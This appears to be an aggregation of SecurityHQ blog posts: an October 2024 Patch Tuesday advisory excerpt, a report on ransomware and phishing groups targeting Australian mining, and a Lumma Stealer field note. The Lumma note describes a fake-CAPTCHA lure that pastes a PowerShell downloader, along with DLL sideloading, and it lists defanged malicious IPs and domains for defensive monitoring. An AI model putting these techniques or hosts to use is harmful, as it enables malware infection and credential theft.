Update all the affected products to their latest patch available.

Microsoft Released its October 2024 Patch Tuesday for 118 flaws with 43 Remote Code Execution Vulnerabilities

Microsoft has released its Patch Tuesday for October 2024 with security updates for 118 flaws with 43 Remote Code Execution Vulnerabilities. Successful exploitation of these vulnerabilities could result in Remote Code Execution, Privilege Escalation, Security Feature Bypass, Information Disclosure, Denial of Service, and Spoofing.

Notable CVEs:

• [Critical] – CVE-2024-43468 – Microsoft Configuration Manager Remote Code Execution Vulnerability
• [Critical] – CVE-2024-43488 – Visual Studio Code extension for Arduino Remote Code Execution Vulnerability
• [Critical] – CVE-2024-43582 – Remote Desktop Protocol Server Remote Code Execution Vulnerability

For the full list of important and moderate CVEs, take a look here.

Affected Products include Windows, Windows Server, Windows Kernel, Microsoft Office, Microsoft Outlook, Microsoft Dynamics, Microsoft SharePoint, SQL Server, Windows Kerberos, Azure, and PowerBI.

Recommendation

Update all the affected products to the latest available patch version.

Threat Intelligence for the Future

SecurityHQ’s Threat Intelligence team is a cohesive global unit dedicated to Cyber Threat Intelligence. Our team is focused on researching emerging threats and tracking activities of threat actors, ransomware groups, and campaigns, to ensure that they stay ahead of potential risks. Beyond their investigative work, the Intelligence team provides actionable threat intelligence and research, enriching the understanding of SecurityHQ’s customers worldwide. United by a common commitment, the SecurityHQ Threat Intelligence team delivers the insights needed to confidently navigate the intricacies of the cyber security threat landscape.

For more information on these threats, speak to an expert here. Or if you suspect a security incident, you can report an incident here.

The post October 2024 Threat Advisory – Top 5 appeared first on SecurityHQ.

Whilst industries across the country face significant threats to their operations, the mining industry is of particular importance due to its significance to the Australian economy.

Australia’s Largest Export Industry

Mining is Australia’s largest export industry, making up about 50% of the country’s total exports. In the 2022-2023 fiscal year, these revenues reached $455 billion, as estimated by the Minerals Council of Australia.

In the same period, the number of Australians employed in the mining industry reached 200,000, with significant potential for expansion as the demand for rare metals, such as lithium, continues to grow.

A wide array of industries and service providers rely on and support the mining industry. Some of these sectors include the energy and chemical industries, where raw materials are used in the manufacturing process. Mining companies also contribute to the growth of other industries such as electronics.

Key Challenges the Mining Industry Faces

Across the globe, the competitive nature of natural resources, as well as their role in economic development, have contributed to making the mining industry an attractive target for cyber threats.

As companies become more reliant on automation, and other data-sensitive systems, these attacks are likely to become increasingly destructive. Moreover, as softening commodity prices and other external factors have led to a slowdown in growth, the industry finds itself especially vulnerable.

• Operational Disruption

As mining companies seek to modernise facilities, they have become increasingly dependent on automated and connective operational technologies to support remote workforces and control operations without being on-site.

Whilst this has brought numerous fiscal and safety benefits to the industry, it has also left companies vulnerable to attacks provided these systems are not configured and monitored correctly.

• Data Theft

The highly sensitive nature of information involved in the sector, such as geological surveys, creates further risks. Since the primary source of a mine’s value is determined by its ore reserves a breach could prove especially destructive.

In addition to financial setbacks, data breaches pose a threat to employees’ personal information, causing further problems such as identity theft.

• Ransomware Attacks

As mining operations become increasingly digitized, key components such as payroll are an attractive prospect for malicious actors. Ransomware attacks are a common means by which this data is encrypted, and a ransom is demanded for its release.

Listen to this podcast on the ransomware attack cycle here.

Aside from the obvious financial risks, the consequences of a ransomware attack could be far-reaching and cost significantly more in terms of downtime and data loss.

• Supply Chain Vulnerabilities

As systems are interconnected within the mining industry, bad actors are well-positioned to infiltrate weaker, third-party connections. In this case, compromising a single link could have widespread consequences not only for mining companies but for an array of connected industries.

Read more about Supply Chain Attacks here.

How SecurityHQ Solves These Challenges

‘SecurityHQ’s SOCs play a crucial role in enhancing the operations of both IT and Operational Technology (OT) for our mining customers. By integrating security protocols that are tailored to the unique challenges of the mining sector, we ensure that both environments operate smoothly and securely. Our SOC provides comprehensive standards and guidelines that help businesses comply with industry regulations. This not only minimizes risks but also strengthens their overall security posture. Our proactive monitoring and incident response capabilities ensure that threats are identified and addressed swiftly, thus maintaining operational continuity and protecting valuable assets.’– Lavannya Daga, Regional CSM Lead, APAC, SecurityHQ

Important security protocols across the industry that SecurityHQ supports, include:

• Access Control: Implement strict access controls to ensure that only authorized personnel can access sensitive areas and systems.
• Real-Time Monitoring: Deploy continuous monitoring solutions to detect anomalies and security breaches in real time. This includes intrusion detection systems (IDS) and Security Information and Event Management (SIEM) tools.
• Incident Response Plans: Develop and regularly update incident response plans specific to mining operations. This ensures quick and effective action in the event of a security breach or operational disruption.
• Vulnerability Assessments: Conduct regular vulnerability assessments and penetration testing to identify and address weaknesses in their environment.
• Compliance with Industry Standards: Adhere to industry standards and regulations, such as ISO/IEC 27001 for information security management and NIST guidelines for cybersecurity by implementing a risk register and evaluating cyber posture.

‘Overall, the collaboration between the SecurityHQ SOC and mining operations fosters a safer, more resilient environment that supports both immediate and long-term business objectives. By implementing a few of these standards, we enable stakeholders across the organization to have improved visibility into potential vulnerabilities and security incidents.’ – Lavannya Daga, Regional CSM Lead, APAC, SecurityHQ

Top Five Threat Groups Targeting Australia

1. INC Blog

INC Blog Ransomware is a recent cybercriminal group that has gained rapid notoriety. The group has distinguished itself through targeted ransomware attacks, as well as a focus on corporate and organisational networks.

• LockBit

LockBit is a Russian-based cybercriminal group offering Ransomware-as-a-Service (RaaS). The software enables malicious actors to carry out two-stage attacks in which a victim’s data is encrypted and ransomed. “From 1^st April 2022 to 31^st March 2023, LockBit accounted for 18% of the total reported Australian ransomware incidents.” – Australian Government

• DragonForce

DragonForce is a Malaysian hacktivist group utilising a similar two-stage attack strategy to LockBit. DragonForce has proven particularly effective through its use of customised ransomware attacks, through which ‘threat actors can leverage tactics such as changing the filename extensions of encrypted files and terminating specific processes and services.’ – Group-IB

• RansomHub

RansomHub is a Russian-oriented group that has claimed at least 227 victims in just 207 days through similar methods.

‘While RansomHub is not confined to a single industry and targets companies across various sectors, its primary targets are companies within the healthcare, finance, and government sectors.’  – Group-IB

• CACTUS

CACTUS follows a similar double-extortion method. Since observation began twelve months ago, the group has found significant success attacking large commercial entities in some of the largest companies in the US, Italy, and the UK.

Top Five Threat Groups Targeting the Mining Industry on a Global Level

There is a significant overlap between the top groups targeting Australia and those targeting the mining industry. INC Blog, LockBit, and DragonForce were observed again, in addition to Play and BlackBasta.

• BlackBasta

BlackBasta is a ransomware operator that emerged in early 2022. Since then, the group has racked up several prominent enterprise victims, often originating in the US, UK, and Australia.

• Play

Play is a ransomware group behind over 300 successful incidents since June 2022 according to Cybersecurity officials in the US and Australia.

Top Five Threat Groups Targeting the Mining Industry in Australia  

• BianLian

BianLian is a cybercriminal group targeting Australian critical infrastructure sectors in addition to professional services and property development since June 2022.

• GTFire

First seen on the 18th of December 2023, GTFire is a group of Threat Actors abusing Google services to initiate Phishing attacks. Their geographic reach is vast and includes the United Arab Emirates, Austria, Australia, Bangladesh, Belgium, Canada, Switzerland, Chile, China, Colombia, Costa Rica, Czech Republic, Germany, Denmark, Dominican Republic, Egypt, Spain, France, United Kingdom, Georgia, Greece, Hong Kong, Israel, India, Italy, Jamaica, Japan, Moldova, Mexico, Malaysia, Netherlands, Norway, New Zealand, Panama, Peru, Philippines, Pakistan, and Russia.

As well as multiple geographies, the group targets multiple industries. These include Advertising, Commerce, Consumer Goods, Education, Energy, Events, Financial Services, Government, Health Care, IT and Cyber Security, Internet Services, Manufacturing, Media & Entertainment, Telecommunications, Mining, Non-Profit, Consulting, Science and Engineering, Transportation, Travel and Hospitality.

• Greatness

Greatness is a cybercrime platform offering ‘Phishing-as-a-Service’, to threat actors specifically targeting users of Microsoft 365 cloud service. Read more about how to spot a phishing attack, here

• Webvoice

On June 1, 2023, experts discovered a phishing campaign targeting corporate users from different countries, during which the attackers used an unidentified Microsoft 365 phishing kit. This campaign uses the domain webvoice[.]com[.]br to redirect victims to phishing pages.

The group was last seen on the 31^st of October 2023, targeting multiple industries. These include Financial Services (Banking, Asset Management, Fintech, etc.), Professional Services (Business Development, Career Planning, Consulting, etc.), Advertising (Affiliate & Social Media Marketing), Agriculture and Farming, Biotechnology (Biopharma, Genetics, Life Science), E-commerce and Retail, Consumer Goods (Cosmetics, Electronics), Education (EdTech), Energy (Oil & Gas, Renewable), Health Care (Medical Devices, Pharmaceuticals), IT & Cyber Security, Manufacturing (Industrial, Machinery), Media & Entertainment, Real Estate, Science & Engineering (Various Fields), Software (Web Development, Robotics), Transportation and Travel.

Their geographic reach spans Albania, Austria, Australia, Spain, United Kingdom, India, United Arab Emirates, Bahrain, Brazil, Canada, Switzerland, China, Colombia, Costa Rica, Germany, Denmark, Estonia, France, Hong Kong, Israel, Italy, South Korea, Luxembourg, Mauritius, Malaysia, Netherlands, New Zealand, Philippines, Sweden, Singapore, United States, and Zambia.

• A7xsurabaya

a7xsurabaya is an attacker who carries out phishing attacks targeting corporate users from different countries. The attacker was discovered on March 17, 2023, and remains active as of February 21, 2024. In these phishing attacks, the attacker uses Office365 phishing pages.

Their geographic reach includes the United Arab Emirates, Australia, Belgium, Canada, Switzerland, China, Costa Rica, Germany, Denmark, Finland, France, United Kingdom, Ghana, Hong Kong, Ireland, Italy, Netherlands, New Zealand, Philippines, Poland, Saudi Arabia, Sweden, Singapore, and the United States.

Industries targeted include Administrative Services (Facilities Support), Advertising, Agriculture, Artificial Intelligence, Clothing and Apparel, E-commerce and Retail, Community and Lifestyle (Elderly, Leisure, etc.), Consumer Goods (DIY, Furniture), Content and Publishing, Data and Analytics, Education (Higher Education, Training), Energy (Efficiency, Oil & Gas, Renewable), Financial Services (Banking, Asset Management, Insurance, etc.), Food and Beverage (Processing, Wine), Government and Military, Health Care (Hospitals, Medical Devices, Nutrition), Information Technology (Cyber Security, Network Security), Manufacturing (Various Fields), Media and Entertainment (Music, Publishing, Social Media), Professional Services (Consulting, Legal, Risk Management), Real Estate (Construction, Property Management), Science and Engineering (Aerospace, Biotechnology, etc.), Software (Enterprise, Mobile Apps), Transportation (Logistics, Public Transportation), Travel and Tourism.

Next Steps to Support Australian-Based Mining Companies

Australia’s latest cybersecurity strategy highlights a commitment towards better data security. Read more about the full strategy here: ‘SecurityHQ and Data#3 Join Forces to Leverage the Australian Cyber Security Strategy 2023-2030’.

The success of this plan greatly depends on companies taking important steps to bolster their defences. Together SecurityHQ and Data#3 aim to provide Australian businesses with the opportunity to build a safer, and more secure, working environment.

‘As these threats evolve, it’s crucial for mining companies to prioritize cybersecurity to safeguard their operations and protect their valuable data. In an era where cyber threats are constantly evolving, staying ahead of the game is crucial. The mining industry must invest in cybersecurity to safeguard its future.’ – Patrick McAteer, Cyber Threat Intelligence Analyst, SecurityHQ 

For more information on how you can protect your data, contact our Australian-based team today.

The post Cyber Threats Targeting the Australian Mining Industry – Key Findings appeared first on SecurityHQ.

‘At SecurityHQ, we have observed Lumma Stealer’s global impact against multiple industries, including IT, media, and manufacturing, where users were compromised by this campaign. Lumma Stealer is known to exfiltrate host details and browser data from the compromised machines, and we have seen some “.shop” domains spreading these malware files.’- Ranjit Patil, SME-Malware Analysis, SecurityHQ

What SecurityHQ Analysts Observed

SecurityHQ has observed two new campaigns to distribute the Lumma Stealer malware, a potent information-stealing threat. These campaigns utilize deceptive tactics, including phishing sites and pirated software, to infect victims’ systems and exfiltrate sensitive data.

1.    Fake CAPTCHA Pages

The first method involves the use of fake CAPTCHA pages hosted on phishing sites, often supported by Content Delivery Networks. These sites trick users into performing keyboard commands, such as “Windows + R” and “CTRL + V” which unknowingly execute a PowerShell script.

The website contains a Java script that copies the Powershell script, and when pasted executes it as a script. This script then downloads and installs the Lumma Stealer malware onto the victim’s device. Once the second-stage payload is downloaded, the malware is executed from a ZIP folder, allowing the attacker to steal sensitive information. 

Technical Analysis of Fake CAPTCHA Pages  

Adversaries often host phishing websites on various platforms, including those that utilize Content Delivery Networks (CDNs). These malicious sites typically present users with a fake CAPTCHA page. 

The sites will force users to go through what looks like a CAPTCHA test. The fake CAPTCHA is designed to trick the user into believing they are completing a standard verification test to prove they are human and not a bot. 

What to Look For  

The fake CAPTCHA test asks the user to perform several keyboard commands that look harmless at first glance. This includes asking the user to press “Windows + R,” which will pull up the run dialog box, and is a way to launch programs. The next step is to press “CTRL + V” and then enter. If executed quickly without careful attention, these commands can result in a PowerShell script being pasted into the Windows Run dialog. This script, when run, downloads and installs the Lumma Stealer malware onto the user’s system. 

The Powershell script connects to the remote server to download a Lumma Stealerzip folder and executes the setup.

2.    Pirated PC Software Sites

The second campaign leverages pirated PC software sites to spread malicious password-protected ZIP files.

Users are lured into downloading these files, believing they contain free copies of commercial software. Upon extraction and execution of the malicious “Setup.exe” a Hijack Loader is injected into a Windows binary, initiating the download and execution of the Lumma Stealer.

The malware gathers information such as browser login credentials, stored passwords, and cookies, which are then sent to a Command-and-Control server. It also establishes persistence by creating scheduled tasks and registry entries. 

Technical Analysis

Adversaries trick users into downloading malicious password-protected archive files that are free copies of commercial software. These copies are stored on the file share platform. The file is a password-protected archive, with the password provided in the file name. 

The extracted Zip file contains multiple Dynamic Link Libraries (DLLs) which are used for the DLL Sideloading attack. Initial execution will start when the user extracts the ZIP file and executes the setup.

Upon execution, a malicious loader is injected into a Windows Binary. Execution of the Hijack Loader results in the download and execution of a binary from the Temp folder which, in turn, performs credential access and maintains sustained network connectivity to the C2 server. 

After execution, the device gathers information like the computer’s name and language information.  

Next, it accesses internal files of Web browsers (Chrome and Edge) and other browsers installed on the device to collect information like login data, stored passwords, and cookies.  

All collected data is sent to the Command-and-Control Server.

IP Addresses:

• 184[.]30[.]21[.]171
• 104[.]26[.]2[.]16
• 188[.]114[.]96[.]3

Domains/URLs:

• Predatowpmn[.]shop
• Fileworld[.]shop
• pang-scrooge-carnage[.]shop
• Preachstrwnwjw[.]shop
• Complainnykso[.]shop

Next Steps to Safeguard Against Lumma

1. Be cautious of suspicious websites, especially those asking for unusual actions like keyboard commands.
2. Avoid downloading software from untrusted sources, as they often contain hidden malware.
3. Monitor the network for the presence of the mentioned Indicator of Compromise (IOC).
4. Segment Networks: By dividing the computer network into smaller more isolated segments or subnetworks to limit or block lateral movement.
5. Deploy EDR: Make sure Endpoint Detection & Response tools have been implemented to detect the latest malware and suspicious activities on endpoints.
6. Strengthen Email Security: Implement advanced email filtering and security measures to prevent phishing emails and malicious attachments from reaching your employees’ inboxes.
7.  Educate Employees: Raise staff awareness about the potential risks associated with opening suspicious emails or documents in general.

For more information about this Malware, how it works, and how to protect against it, contact an expert, here.

The post Resurgence in Lumma Stealer Malware Campaigns – Notes from the Field appeared first on SecurityHQ.